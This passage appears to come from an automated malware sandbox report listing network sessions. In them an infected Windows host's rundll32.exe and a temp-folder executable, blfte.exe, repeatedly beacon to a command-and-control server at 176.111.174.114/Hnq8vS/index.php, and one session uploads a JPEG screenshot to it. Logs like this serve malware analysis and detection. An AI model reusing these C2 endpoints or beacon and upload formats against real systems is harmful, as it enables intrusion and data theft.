Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
540         176.111.174.114  80           192.168.2.4      50074             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.366836071 CEST  12883               IN         HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:36 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
541         192.168.2.4      50075        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.567079067 CEST  13044               OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
542         176.111.174.114  80           192.168.2.4      50075             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.663983107 CEST  13071               IN         HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:36 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
543         176.111.174.114  80           192.168.2.4      50073             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.740179062 CEST  13072               IN         HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:36 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
544         192.168.2.4      50076        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.873467922 CEST  13073               OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
545         176.111.174.114  80           192.168.2.4      50076             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:36.976913929 CEST  13073               IN         HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:36 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
546         192.168.2.4      50078        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:37.192739964 CEST  13074               OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
547         176.111.174.114  80           192.168.2.4      50078             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:37.290196896 CEST  13074               IN         HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:37 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
548         192.168.2.4      50079        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 23:00:37.512600899 CEST  13075               OUT        POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          549 | 176.111.174.114 | 80 | 192.168.2.4 | 50079 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:37.615540028 CEST | 13075 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          55 | 176.111.174.114 | 80 | 192.168.2.4 | 49775 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:19.297032118 CEST | 4548 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          550 | 192.168.2.4 | 50080 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:37.825912952 CEST | 13076 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          551 | 176.111.174.114 | 80 | 192.168.2.4 | 50080 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:37.922198057 CEST | 13076 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          552 | 192.168.2.4 | 50082 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.135567904 CEST | 13077 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          553 | 176.111.174.114 | 80 | 192.168.2.4 | 50082 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.240652084 CEST | 13077 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          554 | 192.168.2.4 | 50083 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.445409060 CEST | 13078 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          555 | 176.111.174.114 | 80 | 192.168.2.4 | 50083 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.550746918 CEST | 13078 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          556 | 192.168.2.4 | 50084 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.763545036 CEST | 13079 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          557 | 176.111.174.114 | 80 | 192.168.2.4 | 50084 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:38.871332884 CEST | 13080 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          558 | 192.168.2.4 | 50085 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:39.089795113 CEST | 13080 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          559 | 176.111.174.114 | 80 | 192.168.2.4 | 50085 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:39.197503090 CEST | 13081 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          56 | 192.168.2.4 | 49776 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:19.501440048 CEST | 4549 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          560 | 192.168.2.4 | 50086 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:39.370913982 CEST | 13094 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x 
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
561 | 192.168.2.4 | 50087 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:39.423311949 CEST | 13095 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
562 | 176.111.174.114 | 80 | 192.168.2.4 | 50087 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
